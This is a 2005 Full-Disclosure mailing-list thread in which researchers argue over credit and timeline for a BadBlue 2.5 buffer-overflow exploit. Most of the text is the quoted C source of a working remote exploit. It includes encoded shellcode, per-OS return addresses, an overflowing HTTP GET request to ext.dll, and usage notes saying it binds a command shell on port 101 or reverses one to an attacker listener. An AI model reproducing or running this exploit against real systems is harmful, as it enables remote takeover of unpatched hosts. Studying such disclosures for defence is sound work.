RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit
(update)next time then publish both in same time because coded or not because
of timeline , the exploit has been brought in first by hat-squad , sorry ;>
-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------
----- Original Message -----
From: Andres Tarasco
To: 'class101@hat-squad.com'
Cc: 'full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org'
Sent: Monday, February 28, 2005 11:18 AM
Subject: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing
Remote Exploit (update)
> Hole History:
>
> 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
> 27-2-2002: Hat-Squad.com releases an exploit
> 28-2-2005: haxorcitos releases a dupe with fake date :>
> or you sux doing private stuffs.
Thats simply not true.
Miguel Tarasco developed the first functional exploit for this vulnerability.
This exploit was not published before because of disclosure Timeline.
regards
On Mon, 28 Feb 2005 09:42:11 +0100, class 101 <class101@hat-squad.com> wrote:
> (reposting again with the hole history)
> Andres Tarasco of sia.es has published yesterday a security hole affecting
> BadBlue 2.5 and below.
>
> http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html
>
> Hat-Squad.com brought you a fresh exploit.
> The exploit and BadBlue v2.5 are both available at class101.org for your
> exploitation's pratices, njoy :)
>
> /*
> BadBlue, Easy File Sharing Remote BOverflow
>
> Homepage: badblue.com
> Affected version: v2.5 (2.60 and below not tested)
> Patched version: v2.61
> Link: badblue.com/bbs98.exe
> Date: 27 February 2005
>
> Application Risk: Severely High
> Internet Risk: Low
>
> Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es)
> Exploit Credits : class101 & metasploit.com
>
> Hole History:
>
> 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
> 27-2-2002: Hat-Squad.com releases an exploit
> 28-2-2005: haxorcitos releases a dupe with fake date :>
> or you sux doing private stuffs.
>
> Notes:
>
> -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by
> BadBlue
> -using offsets from ext.dll, universal.
> -use findjmp2 to quick search into ext.dll to see
> if the offsets changes in the others BadBlue's versions below 2.5
> -if you need the v2.5 for exploitation's pratices, get it on class101.org
> -rename to .c for nux, haven't tested this one but it should works fine.
>
> Greet:
>
> Nima Majidi
> Behrang Fouladi
> Pejman
> Hat-Squad.com
> metasploit.com
> A^C^E of addict3d.org
> str0ke of milw0rm.com
> and my homy class101.org :>
> */
>
> #include <stdio.h>
> #include <string.h>
> #include <time.h>
> #ifdef WIN32
> #include "winsock2.h"
> #pragma comment(lib, "ws2_32")
> #else
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <netinet/in.h>
> #include <netinet/in_systm.h>
> #include <netinet/ip.h>
> #include <netdb.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <stdlib.h>
> #include <fcntl.h>
> #endif
>
> char scode[]=
> /*XORed, I kiss metasploit.com because they are what means elite!*/
> "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03"
> "\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec"
> "\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98"
> "\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22"
> "\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47"
> "\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f"
> "\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53"
> "\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d"
> "\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21"
> "\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75"
> "\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec"
> "\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76"
> "\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42"
> "\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b"
> "\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4"
> "\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e"
> "\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0"
> "\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61"
> "\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12"
> "\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec"
> "\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b"
> "\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";
>
> char payload[1024];
>
> char ebx[]="\x05\x53\x02\x10"; /*call.ext.dll*/
> char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;>*/
> char pad[]="\xEB\x0C\x90\x90";
> char pad2[]="\xE9\x05\xFE\xFF\xFF";
> char EOL[]="\x0D\x0A\x0D\x0A";
> char talk[]=
> "\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63"
> "\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D";
>
> #ifdef WIN32
> WSADATA wsadata;
> #endif
>
> void ver();
> void usage(char* us);
>
> int main(int argc,char *argv[])
> {
> ver();
> unsigned long gip;
> unsigned short gport;
> char *target, *os;
> if
> (argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return
-1;
> }
> if (argc==5){usage(argv[0]);return -1;}
> if (strlen(argv[2])<7){usage(argv[0]);return -1;}
> if (argc==6)
> {
> if (strlen(argv[4])<7){usage(argv[0]);return -1;}
> }
> #ifndef WIN32
> if (argc==6)
> {
> gip=inet_addr(argv[4])^(long)0x93939393;
> gport=htons(atoi(argv[5]))^(short)0x9393;
> }
> #define Sleep sleep
> #define SOCKET int
> #define closesocket(s) close(s)
> #else
> if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup
> error\n");return -1;}
> if (argc==6)
> {
> gip=inet_addr(argv[4])^(ULONG)0x93939393;
> gport=htons(atoi(argv[5]))^(USHORT)0x9393;
> }
> #endif
> int ip=htonl(inet_addr(argv[2])), port;
> if (argc==4||argc==6){port=atoi(argv[3]);} else port=80;
> SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
> s=socket(AF_INET,SOCK_STREAM,0);
> if (s==-1){printf("[+] socket() error\n");return -1;}
> if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+]
> Win2k SP4 Pro. English\n[+] Win2k SP- - -";}
> if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2 Pro. English\n[+]
> WinXP SP1a Pro. English\n[+] WinXP SP- - -";}
> if (atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+]
> Win2003 SP- - -";}
> printf("[+] target(s): %s\n",os);
> server.sin_family=AF_INET;
> server.sin_addr.s_addr=htonl(ip);
> server.sin_port=htons(port);
> if (argc==6){printf("[+] reverse mode disabled for this exploit\n");
> printf("[+] get the source at class101.org and update
> yourself!\n");return -1;}
> connect(s,( struct sockaddr *)&server,sizeof(server));
> timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
> switch(select(s+1,NULL,&mask,NULL,&timeout))
> {
> case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
> case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
> default:
> if(FD_ISSET(s,&mask))
> {
> printf("[+] connected, constructing the payload...\n");
> #ifdef WIN32
> Sleep(1000);
> #else
> Sleep(1);
> #endif
> strcpy(payload,talk);
> memset(payload+29,0x90,520);
> if (atoi(argv[1]) == 1||atoi(argv[1]) == 2)
> {
> memcpy(payload+29+492,&pad,4);
> memcpy(payload+521+4,target,4);
> memcpy(payload+536+1,pad2,5);
> }
> else
> {
> memcpy(payload+29+485,&pad,4);
> memcpy(payload+514+4,target,4);
> memcpy(payload+529+1,pad2,5);
> }
> strcat(payload,EOL);
> memcpy(payload+36+3,scode,strlen(scode));
> if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error
1,
> the server prolly rebooted.\n");return -1;}
> #ifdef WIN32
> Sleep(2000);
> #else
> Sleep(2);
> #endif
>
> printf("[+] size of payload: %d\n",strlen(payload));
> printf("[+] payload sent.\n");
> return 0;
> }
> }
> closesocket(s);
> #ifdef WIN32
> WSACleanup();
> #endif
> return 0;
> }
>
> void usage(char* us)
> {
> printf("USAGE:\n");
> printf(" [+] . 101_bblu.exe Target VulnIP (bind mode)\n");
> printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n");
> printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT
> (reverse mode)\n");
> printf("TARGET: \n");
> printf(" [+] 1. Win2k SP4 Server English (*)\n");
> printf(" [+] 1. Win2k SP4 Pro English (*)\n");
> printf(" [+] 1. Win2k SP- - - \n");
> printf(" [+] 2. WinXP SP2 Pro. English \n");
> printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
> printf(" [+] 2. WinXP SP- - - \n");
> printf(" [+] 3. Win2k3 SP0 Server Italian (*)\n");
> printf(" [+] 3. Win2k3 SP- - - \n");
> printf("NOTE: \n");
> printf(" The exploit bind a cmdshell port 101 or\n");
> printf(" reverse a cmdshell on your listener.\n");
> printf(" A wildcard (*) mean tested working, else, supposed
> working.\n");
> printf(" A symbol (-) mean all.\n");
> printf(" Compilation msvc6, cygwin, Linux.\n");
> return;
> }
> void ver()
> {
> printf("
> \n");
> printf("
> ===================================================[0.1]=====\n");
> printf(" ================BadBlue, Easy File Sharing
> 2.5===============\n");
> printf(" ================ext.dll, Remote Stack
> Overflow===============\n");
> printf(" ======coded by
> class101==================[Hat-Squad.com]=====\n");
> printf(" =====================================[class101.org
> 2005]=====\n");
> printf("
> \n");
> }
>
> -------------------------------------------------------------
> class101
> Jr. Researcher
> Hat-Squad.com
> -------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
--
Loco de aTar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
